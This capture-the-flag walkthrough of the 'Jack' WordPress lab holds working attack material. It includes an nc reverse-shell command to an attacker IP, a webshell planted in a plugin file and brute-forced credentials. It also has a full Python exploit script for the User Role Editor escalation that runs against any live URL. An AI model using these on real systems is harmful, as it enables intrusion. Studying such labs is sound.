Jack

06a922d381893a3db54a051d45b0b33e.png

Target IP: 10.10.133.0
Challenge Description:
6a2bb97fa39062282bd6d35563865079.png


Reconnaissance

0686743e70ec84b92b0ea5bca098f345.png
The challenge instructs me to add the hostname jack.thm to my /etc/hosts file. I made the change to /etc/hosts as shown above.

b99379edfb5a34b2b1eb25334cf83967.png
A port scan shows two TCP ports open on the target machine, SSH and HTTP, as shown above. I am assuming the WordPress application runs on port 80.

835374c85b433f6b8a8fda1cf1660184.png
An aggressive port scan against the two open TCP ports returns the result above: it identified the WordPress application and the disallowed entry /wp-admin in robots.txt. Next, a subdomain search. It only found the entry www, so I added that to my /etc/hosts file as well.


Enumeration

Port 80: HTTP
c8a0970cac41f29e54b25aa56b72b91a.png
Browsing to port 80 displays the webpage above, which contains a single post created by the user jack.

a6f32f2fc72536cf974af0633200d668.png
According to Wappalyzer, the target is running WordPress version 5.3.2, as shown above. Now I have more information about the web application.

e263b7bf8641a594f8a2dcf2cecff7c7.png
Using wpscan with the command wpscan --url http://jack.thm --enumerate u,ap (users and all plugins), I found the three usernames shown above. Maybe I can brute-force their passwords?

c28ee7a51b5718982950b2431dd0423f.png
And bingo! I first tried to brute-force the three users' passwords with the rockyou.txt wordlist but had no luck even after thirty minutes. I then switched to fasttrack.txt and got a hit for the user wendy, as shown above. Now I have the credentials wendy:changelater.

0ad51162bf9b189be61f330ff64ca981.png
I browsed to the /wp-login page to log in with the newly brute-forced credentials.

b882e252b120cf3b5424df9164ef2b16.png
Now I have access to the WordPress application as the user wendy, as shown above. However, this user has low privileges: I am unable to change the theme, view the plugins, etc. I ran scans for vulnerable plugins and themes, but had no luck. I have hit a brick wall.


Exploitation

eea26be1918c7eb1eb2d6d158701d436.png
After some online searching, I found that the web application could be vulnerable through the User Role Editor plugin. I found the interesting article above; maybe I can test it against the target machine?

685113dc51ae3c876ef7e67dc71cacd2.png
The article from the previous image says to intercept the request with Burp Suite after pressing the Update Profile button in the Your Profile section, then append the parameter &ure_other_roles=administrator to the request body and follow the redirects.
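The same request chain in script form, as an added example that is not code from the original writeup or from the article it cites: log in as the low-privileged user, fetch the profile page to pick up the hidden form fields (including the _wpnonce WordPress checks), and re-submit the profile update with the single extra parameter ure_other_roles=administrator. The login and profile paths are WordPress defaults; the CAPTURED_FIELDS and SAMPLE_PROFILE_HTML values are constructed stand-ins for what Burp would show, included so the helpers can be exercised offline.

```python
"""Replay the User Role Editor privilege-escalation request.

Added example, not code from the original writeup. Default WordPress paths are
assumed; CAPTURED_FIELDS and SAMPLE_PROFILE_HTML are constructed samples.
"""
import html
import re
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

INJECTED_FIELD = "ure_other_roles"
TARGET_ROLE = "administrator"

# Constructed sample of an intercepted "Update Profile" POST body, as a dict.
CAPTURED_FIELDS = {
    "_wpnonce": "a1b2c3d4e5",
    "_wp_http_referer": "/wp-admin/profile.php",
    "from": "profile",
    "checkuser_id": "2",
    "action": "update",
    "user_id": "2",
    "nickname": "wendy",
    "email": "wendy@example.com",
    "submit": "Update Profile",
}

# Constructed fragment of a profile page, enough to exercise the parser.
SAMPLE_PROFILE_HTML = """
<form id="your-profile" action="profile.php" method="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="deadbeef12" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/profile.php" />
<input type="hidden" name="from" value="profile" />
<input type="hidden" name="checkuser_id" value="2" />
<input type="text" name="nickname" id="nickname" value="wendy" class="regular-text" />
<input type="submit" name="submit" id="submit" class="button" value="Update Profile" />
</form>
"""


def inject_role(form_fields, role=TARGET_ROLE):
    """Copy the intercepted fields and append the plugin's role parameter.
    Nothing else is touched: the nonce, user_id and action=update must stay
    intact or WordPress rejects the request before the plugin ever sees it."""
    escalated = dict(form_fields)
    escalated[INJECTED_FIELD] = role
    return escalated


def encode_body(form_fields):
    """URL-encode the fields into the body Burp shows (field order is kept)."""
    return urllib.parse.urlencode(form_fields)


def parse_form_fields(page_html):
    """Collect name/value pairs from <input> tags so the hidden fields can be
    replayed. A regex is enough for WordPress's own form; it is not a general
    HTML parser, and radio/checkbox groups collapse to the last value seen."""
    fields = {}
    for tag in re.findall(r"<input\b[^>]*>", page_html, flags=re.I):
        name = re.search(r'\bname=["\']([^"\']+)["\']', tag)
        if not name:
            continue
        value = re.search(r'\bvalue=["\']([^"\']*)["\']', tag)
        fields[html.unescape(name.group(1))] = html.unescape(value.group(1)) if value else ""
    return fields


def escalate(base_url, username, password):
    """Run the whole chain against a live target and return the HTTP status of
    the replayed profile update. urllib follows redirects, which covers the
    'follow the redirects' step from the article."""
    jar = CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(base_url + "/wp-login.php")  # sets the wordpress_test_cookie
    login_body = urllib.parse.urlencode({
        "log": username, "pwd": password, "wp-submit": "Log In",
        "redirect_to": base_url + "/wp-admin/", "testcookie": "1",
    }).encode()
    opener.open(base_url + "/wp-login.php", data=login_body)
    profile_html = opener.open(base_url + "/wp-admin/profile.php").read().decode("utf-8", "replace")
    fields = parse_form_fields(profile_html)
    if "_wpnonce" not in fields:
        raise RuntimeError("no profile form found; login probably failed")
    body = encode_body(inject_role(fields)).encode()
    return opener.open(base_url + "/wp-admin/profile.php", data=body).status


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 4:
        # Offline: show what the escalated body looks like for the sample.
        print(encode_body(inject_role(CAPTURED_FIELDS)))
    else:
        url, user, pw = sys.argv[1:4]  # e.g. http://jack.thm wendy changelater
        print("profile update returned HTTP", escalate(url, user, pw))
```

Run without arguments to see the escalated body for the constructed sample; with a URL, username and password it performs the chain against a target. Checking that the role actually changed (for example, that the Plugins menu now appears in /wp-admin/) is left to the reader, as in the writeup.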

da16a7a9d79abfd52ecdb6676164ee56.png
After doing this, the user wendy has administrator privileges on the WordPress application, as shown above. Now I should be able to edit the theme files to obtain a reverse shell. However, I had no luck when I tried to replace the theme files with my PHP reverse shell. Time to enumerate harder.

7ab0fe99a9c6a27a6902067753f291ae.png
I noticed the Akismet plugin is installed. I inserted my PHP webshell at the beginning of the plugin's akismet.php file, as shown above.

a137287b5ed272bb6210b7e40d7e35e9.png
And bingo! Now I can reach my PHP webshell. I issued the commands ls;id;whoami and obtained the output above. Time to turn this into a reverse shell connection. I started a listener on my machine on port 8443.

3dfe00993334723982d3cbdd64c6b2b1.png
Through the PHP webshell I issued the URL-encoded nc reverse shell rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff, which decodes to rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.14.55.153 8443 >/tmp/f (the classic named-pipe trick for an nc that lacks the -e option). Now I have a foothold on the target machine as www-data, as shown above.


Privilege Escalation

fe1d89f690f17de70750469a7c9209c1.png
After landing a shell on the target machine, I found a user called jack. This user has a file called reminder.txt, as shown above. Can I find the backup files it refers to?

2485e1db7fb2f6bdf93b5eea6ed6800b.png
I ran the command find / -name "*backup*" 2>/dev/null to find any file names containing backup. This led to the directory /var/backups, as shown above, which contains an SSH key.

162af92f10549da94a598c8240b612c2.png
Does this SSH key belong to the user jack? I copied the key to my machine and changed its permissions to 400 so ssh will accept it.

156836a3f91b7137776875b8e01ed346.png
And bingo! Using the SSH key, I connected to the target machine as the user jack. I have successfully moved from www-data to jack, as shown above.

2a3da16c87cd0f78f101fa784c2d95fd.png
I transferred pspy64 to the target machine and obtained the interesting result above: the Python script checker.py is being executed as root.

ddc590c7ca9613cca5f3384dd6e08ede.png
I browsed to /opt/statuscheck and found two files, checker.py and output.log. The content of checker.py is shown above. I cannot modify the script directly as I lack the privileges, but it imports the os module. Maybe I can edit that instead?

da6526b1aa1c9e30f8f26196857e0b15.png
Running the command find / -writable -type f 2>/dev/null shows that /usr/lib/python2.7/os.py is writable!

33ad98127396e7e23d1afd2c3e772292.png
I inserted my Python reverse shell at the bottom of /usr/lib/python2.7/os.py. Since the payload now lives inside the os module itself, the os. prefix is dropped from its calls (the underlying posix functions are already in that module's namespace). Then I started a listener on my machine on port 8444.
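The root cause here is that importing a module runs its top-level code, so any writable file on a privileged interpreter's import path is a code-execution primitive. The following script is an added example, not part of the original writeup: it audits the import path of the interpreter it runs under for writable .py files and writable directories (the check that would have flagged os.py), and then demonstrates in a throwaway temporary directory that a planted module executes as soon as something imports it. The module name planted.py and the marker file are assumptions made for the demo. It runs under Python 2 and 3, so it can be pointed at the same python2.7 the cron job used.

```python
"""Audit the Python import path for writable modules and show why it matters.

Added example, not code from the original writeup. Assumes nothing about the
target beyond what the interpreter reports in sys.path; planted.py and the
marker file exist only inside a temporary directory created for the demo.
"""
from __future__ import print_function

import os
import subprocess
import sys
import tempfile


def default_is_writable(path):
    """os.access honours the real uid, which is exactly what a local user has."""
    return os.access(path, os.W_OK)


def find_writable_modules(search_paths=None, is_writable=default_is_writable):
    """Return a sorted list of (kind, path) for every writable .py file and
    every writable directory on the import path. Writable directories count
    too: a new file dropped there can shadow a module that lives later in
    sys.path, or a .pyc can be planted next to a read-only source."""
    if search_paths is None:
        search_paths = [p for p in sys.path if p]  # '' means cwd; skip it
    findings = set()
    for base in search_paths:
        if not os.path.isdir(base):
            continue
        if is_writable(base):
            findings.add(("dir", base))
        for root, _dirs, files in os.walk(base):
            for name in files:
                if name.endswith(".py"):
                    full = os.path.join(root, name)
                    if is_writable(full):
                        findings.add(("file", full))
    return sorted(findings)


def make_demo_tree():
    """Build a throwaway 'library' directory holding one module whose
    top-level code writes a marker file when imported. Returns
    (library_dir, module_path, marker_path)."""
    lib = tempfile.mkdtemp(prefix="writable_lib_")
    marker = os.path.join(lib, "imported.marker")
    module = os.path.join(lib, "planted.py")
    with open(module, "w") as fh:
        # Stands in for the reverse shell appended to os.py in the writeup.
        fh.write("with open(%r, 'w') as f:\n    f.write('top-level code ran')\n" % marker)
    return lib, module, marker


def demonstrate_import_execution(lib, marker):
    """Import the planted module in a child interpreter with the demo directory
    first on its path. Returns True if the marker appeared, i.e. the module's
    code executed merely because something imported it."""
    env = dict(os.environ, PYTHONPATH=lib)
    subprocess.check_call([sys.executable, "-c", "import planted"], env=env)
    return os.path.exists(marker)


if __name__ == "__main__":
    for kind, path in find_writable_modules():
        print("%-4s %s" % (kind, path))
    lib, module, marker = make_demo_tree()
    print("planted module executed on import:", demonstrate_import_execution(lib, marker))
```

Run it as the unprivileged user with the interpreter the privileged job uses; any "file" line under a system path such as /usr/lib/python2.7 is the finding the writeup exploits, and any "dir" line is a place where a shadowing module could be dropped even without touching existing files.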

b4e49eb13082c266f027566e0689a15e.png
And after waiting about a minute for the next run of checker.py, I received a reverse shell connection on port 8444. Now I have root access on the target machine :)


Flags

ee1048f37ad01a012169d46083fb58a3.png
The user.txt flag is shown above. It is located in the home directory of the user jack.

c80dd5683ed204ee60f2d91fa4258a78.png
The root.txt flag is shown above. It is obtainable after hijacking the writable os.py module.